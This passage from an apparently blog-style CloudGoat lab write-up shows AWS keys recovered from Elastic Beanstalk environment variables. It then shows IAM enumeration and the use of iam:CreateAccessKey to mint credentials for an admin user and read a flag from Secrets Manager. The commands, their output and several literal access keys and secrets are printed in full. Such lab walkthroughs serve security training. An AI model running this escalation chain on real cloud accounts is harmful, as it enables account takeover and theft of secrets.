class="s2">"OptionName"</span>: <span class="s2">"SECONDARY_ACCESS_KEY"</span>, <span class="s2">"Value"</span>: <span class="s2">"AKIAZI2LCSHND4ONUGEM"</span> <span class="o">}</span> <span class="o">{</span> <span class="s2">"Namespace"</span>: <span class="s2">"aws:elasticbeanstalk:application:environment"</span>, <span class="s2">"OptionName"</span>: <span class="s2">"SECONDARY_SECRET_KEY"</span>, <span class="s2">"Value"</span>: <span class="s2">"pSGrnRE8rRMWqoKWdeB0OHd/BPL+0T+eC8zwQlWJ"</span> <span class="o">}</span> </code></pre> </div> <p>now using these credentials enumerate IAM permissions to eventually create an access key for an administrator user</p> <h2> Personal Script </h2> <p>use my own script to do the IAM enumeration<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">{</span> <span class="s2">"current_user"</span>: <span class="s2">"cgidrddh9uxljn_secondary_user"</span>, <span class="s2">"users"</span>: <span class="o">[</span> <span class="s2">"cgidrddh9uxljn_secondary_user"</span> <span class="o">]</span>, <span class="s2">"managed_policies"</span>: <span class="o">{</span> <span class="s2">"cgidrddh9uxljn_secondary_user"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"PolicyName"</span>: <span class="s2">"cgidrddh9uxljn_secondary_policy"</span>, <span class="s2">"PolicyArn"</span>: <span class="s2">"arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span>, <span class="s2">"inline_policies"</span>: <span class="o">{</span> <span class="s2">"cgidrddh9uxljn_secondary_user"</span>: <span class="o">[]</span> <span class="o">}</span>, <span class="s2">"groups_managed_policies"</span>: <span class="o">{</span> <span class="s2">"Admin"</span>: <span class="o">[]</span> <span class="o">}</span>, <span class="s2">"groups_inline_policies"</span>: <span class="o">{</span> <span class="s2">"Admin"</span>: <span class="o">[]</span> <span class="o">}</span>, <span class="s2">"users_groups"</span>: <span class="o">{}</span>, <span class="s2">"roles"</span>: <span class="o">{</span> <span class="s2">"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah"</span>: <span class="o">{</span> <span class="s2">"RoleId"</span>: <span class="s2">"AROAZI2LCSHNHAYBZ7NB6"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:role/cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah"</span>, <span class="s2">"AssumeRolePolicyDocument"</span>: <span class="o">{</span> <span class="s2">"Version"</span>: <span class="s2">"2012-10-17"</span>, <span class="s2">"Statement"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Sid"</span>: <span class="s2">""</span>, <span class="s2">"Effect"</span>: <span class="s2">"Allow"</span>, <span class="s2">"Principal"</span>: <span class="o">{</span> <span class="s2">"AWS"</span>: <span class="s2">"AIDAZI2LCSHNC6T5WHMCJ"</span> <span class="o">}</span>, <span class="s2">"Action"</span>: <span class="s2">"sts:AssumeRole"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> <span class="o">}</span>, <span class="s2">"cgidrddh9uxljn_eb_instance_role"</span>: <span class="o">{</span> <span class="s2">"RoleId"</span>: <span class="s2">"AROAZI2LCSHNFI4A4BNZE"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:role/cgidrddh9uxljn_eb_instance_role"</span>, <span class="s2">"AssumeRolePolicyDocument"</span>: <span class="o">{</span> <span class="s2">"Version"</span>: <span class="s2">"2012-10-17"</span>, <span class="s2">"Statement"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Effect"</span>: <span class="s2">"Allow"</span>, <span class="s2">"Principal"</span>: <span class="o">{</span> <span class="s2">"Service"</span>: <span class="s2">"ec2.amazonaws.com"</span> <span class="o">}</span>, <span class="s2">"Action"</span>: <span class="s2">"sts:AssumeRole"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> <span class="o">}</span>, <span class="s2">"cgidrddh9uxljn_eb_service_role"</span>: <span class="o">{</span> <span class="s2">"RoleId"</span>: <span class="s2">"AROAZI2LCSHNKBOPAXYCP"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:role/cgidrddh9uxljn_eb_service_role"</span>, <span class="s2">"AssumeRolePolicyDocument"</span>: <span class="o">{</span> <span class="s2">"Version"</span>: <span class="s2">"2012-10-17"</span>, <span class="s2">"Statement"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Effect"</span>: <span class="s2">"Allow"</span>, <span class="s2">"Principal"</span>: <span class="o">{</span> <span class="s2">"Service"</span>: <span class="s2">"elasticbeanstalk.amazonaws.com"</span> <span class="o">}</span>, <span class="s2">"Action"</span>: <span class="s2">"sts:AssumeRole"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> <span class="o">}</span>, <span class="s2">"rds-monitoring-role"</span>: <span class="o">{</span> <span class="s2">"RoleId"</span>: <span class="s2">"AROAZI2LCSHNCK26BPXQW"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:role/rds-monitoring-role"</span>, <span class="s2">"AssumeRolePolicyDocument"</span>: <span class="o">{</span> <span class="s2">"Version"</span>: <span class="s2">"2012-10-17"</span>, <span class="s2">"Statement"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Sid"</span>: <span class="s2">""</span>, <span class="s2">"Effect"</span>: <span class="s2">"Allow"</span>, <span class="s2">"Principal"</span>: <span class="o">{</span> <span class="s2">"Service"</span>: <span class="s2">"monitoring.rds.amazonaws.com"</span> <span class="o">}</span>, <span class="s2">"Action"</span>: <span class="s2">"sts:AssumeRole"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> <span class="o">}</span>, <span class="s2">"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1"</span>: <span class="o">{</span> <span class="s2">"RoleId"</span>: <span class="s2">"AROAZI2LCSHNEK7B2PR7Y"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:role/vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1"</span>, <span class="s2">"AssumeRolePolicyDocument"</span>: <span class="o">{</span> <span class="s2">"Version"</span>: <span class="s2">"2012-10-17"</span>, <span class="s2">"Statement"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Sid"</span>: <span class="s2">""</span>, <span class="s2">"Effect"</span>: <span class="s2">"Allow"</span>, <span class="s2">"Principal"</span>: <span class="o">{</span> <span class="s2">"Service"</span>: <span class="s2">"lambda.amazonaws.com"</span> <span class="o">}</span>, <span class="s2">"Action"</span>: <span class="s2">"sts:AssumeRole"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span>, <span class="s2">"attached_role_policies"</span>: <span class="o">{</span> <span class="s2">"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah"</span>: <span class="o">[]</span>, <span class="s2">"cgidrddh9uxljn_eb_instance_role"</span>: <span class="o">[]</span>, <span class="s2">"cgidrddh9uxljn_eb_service_role"</span>: <span class="o">[]</span>, <span class="s2">"rds-monitoring-role"</span>: <span class="o">[</span> <span class="s2">"arn:aws:iam::aws:policy/service-role/AmazonRDSEnhancedMonitoringRole"</span> <span class="o">]</span>, <span class="s2">"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1"</span>: <span class="o">[]</span> <span class="o">}</span>, <span class="s2">"inline_role_policies"</span>: <span class="o">{</span> <span class="s2">"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah"</span>: <span class="o">{}</span>, <span class="s2">"cgidrddh9uxljn_eb_instance_role"</span>: <span class="o">{}</span>, <span class="s2">"cgidrddh9uxljn_eb_service_role"</span>: <span class="o">{}</span>, <span class="s2">"rds-monitoring-role"</span>: <span class="o">{}</span>, <span class="s2">"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1"</span>: <span class="o">{}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <h2> Managed Policy Versions </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws iam get-policy <span class="se">\ </span> <span class="nt">--policy-arn</span> arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy <span class="se">\</span> <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"Policy"</span>: <span class="o">{</span> <span class="s2">"PolicyName"</span>: <span class="s2">"cgidrddh9uxljn_secondary_policy"</span>, <span class="s2">"PolicyId"</span>: <span class="s2">"ANPAZI2LCSHNNTIDMXKIF"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy"</span>, <span class="s2">"Path"</span>: <span class="s2">"/"</span>, <span class="s2">"DefaultVersionId"</span>: <span class="s2">"v1"</span>, <span class="s2">"AttachmentCount"</span>: 1, <span class="s2">"PermissionsBoundaryUsageCount"</span>: 0, <span class="s2">"IsAttachable"</span>: <span class="nb">true</span>, <span class="s2">"CreateDate"</span>: <span class="s2">"2025-07-06T07:57:54+00:00"</span>, <span class="s2">"UpdateDate"</span>: <span class="s2">"2025-07-06T07:57:54+00:00"</span>, <span class="s2">"Tags"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Key"</span>: <span class="s2">"Scenario"</span>, <span class="s2">"Value"</span>: <span class="s2">"beanstalk_secrets"</span> <span class="o">}</span>, <span class="o">{</span> <span class="s2">"Key"</span>: <span class="s2">"Stack"</span>, <span class="s2">"Value"</span>: <span class="s2">"CloudGoat"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws iam get-policy-version <span class="nt">--policy-arn</span> arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy <span class="nt">--version-id</span> v1 <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"PolicyVersion"</span>: <span class="o">{</span> <span class="s2">"Document"</span>: <span class="o">{</span> <span class="s2">"Statement"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Action"</span>: <span class="o">[</span> <span class="s2">"iam:CreateAccessKey"</span> <span class="o">]</span>, <span class="s2">"Effect"</span>: <span class="s2">"Allow"</span>, <span class="s2">"Resource"</span>: <span class="s2">"*"</span> <span class="o">}</span>, <span class="o">{</span> <span class="s2">"Action"</span>: <span class="o">[</span> <span class="s2">"iam:ListRoles"</span>, <span class="s2">"iam:GetRole"</span>, <span class="s2">"iam:ListPolicies"</span>, <span class="s2">"iam:GetPolicy"</span>, <span class="s2">"iam:ListPolicyVersions"</span>, <span class="s2">"iam:GetPolicyVersion"</span>, <span class="s2">"iam:ListUsers"</span>, <span class="s2">"iam:GetUser"</span>, <span class="s2">"iam:ListGroups"</span>, <span class="s2">"iam:GetGroup"</span>, <span class="s2">"iam:ListAttachedUserPolicies"</span>, <span class="s2">"iam:ListAttachedRolePolicies"</span>, <span class="s2">"iam:GetRolePolicy"</span> <span class="o">]</span>, <span class="s2">"Effect"</span>: <span class="s2">"Allow"</span>, <span class="s2">"Resource"</span>: <span class="s2">"*"</span> <span class="o">}</span> <span class="o">]</span>, <span class="s2">"Version"</span>: <span class="s2">"2012-10-17"</span> <span class="o">}</span>, <span class="s2">"VersionId"</span>: <span class="s2">"v1"</span>, <span class="s2">"IsDefaultVersion"</span>: <span class="nb">true</span>, <span class="s2">"CreateDate"</span>: <span class="s2">"2025-07-06T07:57:54+00:00"</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>Since you already have permissions like <code>iam:CreateAccessKey</code> and have discovered the user <code>cgidrddh9uxljn_admin_user</code>, <strong>you can create new credentials</strong> (Access Key + Secret) for that user and gain access as them — <strong>even without knowing their existing credentials</strong>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws iam list-users <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"Users"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Path"</span>: <span class="s2">"/"</span>, <span class="s2">"UserName"</span>: <span class="s2">"cgidrddh9uxljn_admin_user"</span>, <span class="s2">"UserId"</span>: <span class="s2">"AIDAZI2LCSHNDLS76Y2GZ"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:user/cgidrddh9uxljn_admin_user"</span>, <span class="s2">"CreateDate"</span>: <span class="s2">"2025-07-06T07:57:54+00:00"</span> <span class="o">}</span>, <span class="o">{</span> <span class="s2">"Path"</span>: <span class="s2">"/"</span>, <span class="s2">"UserName"</span>: <span class="s2">"cgidrddh9uxljn_low_priv_user"</span>, <span class="s2">"UserId"</span>: <span class="s2">"AIDAZI2LCSHNL62NPKJBK"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:user/cgidrddh9uxljn_low_priv_user"</span>, <span class="s2">"CreateDate"</span>: <span class="s2">"2025-07-06T07:57:54+00:00"</span> <span class="o">}</span>, <span class="o">{</span> <span class="s2">"Path"</span>: <span class="s2">"/"</span>, <span class="s2">"UserName"</span>: <span class="s2">"cgidrddh9uxljn_secondary_user"</span>, <span class="s2">"UserId"</span>: <span class="s2">"AIDAZI2LCSHNPBONLSC4A"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:user/cgidrddh9uxljn_secondary_user"</span>, <span class="s2">"CreateDate"</span>: <span class="s2">"2025-07-06T07:57:54+00:00"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws iam create-access-key <span class="se">\</span> <span class="nt">--user-name</span> cgidrddh9uxljn_admin_user <span class="se">\</span> <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"AccessKey"</span>: <span class="o">{</span> <span class="s2">"UserName"</span>: <span class="s2">"cgidrddh9uxljn_admin_user"</span>, <span class="s2">"AccessKeyId"</span>: <span class="s2">"AKIAZI2LCSHNFA6ZBTTK"</span>, <span class="s2">"Status"</span>: <span class="s2">"Active"</span>, <span class="s2">"SecretAccessKey"</span>: <span class="s2">"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"</span>, <span class="s2">"CreateDate"</span>: <span class="s2">"2025-07-06T08:46:39+00:00"</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>now use these credentials to configure<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> ┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws sts get-caller-identity <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"UserId"</span>: <span class="s2">"AIDAZI2LCSHNDLS76Y2GZ"</span>, <span class="s2">"Account"</span>: <span class="s2">"637423227354"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:user/cgidrddh9uxljn_admin_user"</span> <span class="o">}</span> </code></pre> </div> <p>with these privileges we will retrieve flag stored in secrets manager<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws secretsmanager list-secrets <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"SecretList"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"ARN"</span>: <span class="s2">"arn:aws:secretsmanager:us-east-1:637423227354:secret:cgidrddh9uxljn_final_flag-KSYyXA"</span>, <span class="s2">"Name"</span>: <span class="s2">"cgidrddh9uxljn_final_flag"</span>, <span class="s2">"LastChangedDate"</span>: <span class="s2">"2025-07-06T12:57:55.311000+05:00"</span>, <span class="s2">"LastAccessedDate"</span>: <span class="s2">"2025-07-06T05:00:00+05:00"</span>, <span class="s2">"Tags"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"Key"</span>: <span class="s2">"Scenario"</span>, <span class="s2">"Value"</span>: <span class="s2">"beanstalk_secrets"</span> <span class="o">}</span>, <span class="o">{</span> <span class="s2">"Key"</span>: <span class="s2">"Stack"</span>, <span class="s2">"Value"</span>: <span class="s2">"CloudGoat"</span> <span class="o">}</span> <span class="o">]</span>, <span class="s2">"SecretVersionsToStages"</span>: <span class="o">{</span> <span class="s2">"terraform-20250706075755171300000002"</span>: <span class="o">[</span> <span class="s2">"AWSCURRENT"</span> <span class="o">]</span> <span class="o">}</span>, <span class="s2">"CreatedDate"</span>: <span class="s2">"2025-07-06T12:57:54.304000+05:00"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <h2> Found The Flag </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws secretsmanager get-secret-value <span class="se">\</span> <span class="nt">--secret-id</span> cgidrddh9uxljn_final_flag <span class="se">\</span> <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"ARN"</span>: <span class="s2">"arn:aws:secretsmanager:us-east-1:637423227354:secret:cgidrddh9uxljn_final_flag-KSYyXA"</span>, <span class="s2">"Name"</span>: <span class="s2">"cgidrddh9uxljn_final_flag"</span>, <span class="s2">"VersionId"</span>: <span class="s2">"terraform-20250706075755171300000002"</span>, <span class="s2">"SecretString"</span>: <span class="s2">"FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}"</span>, <span class="s2">"VersionStages"</span>: <span class="o">[</span> <span class="s2">"AWSCURRENT"</span> <span class="o">]</span>, <span class="s2">"CreatedDate"</span>: <span class="s2">"2025-07-06T12:57:55.307000+05:00"</span> <span class="o">}</span> </code></pre> </div> aws python infosec cloud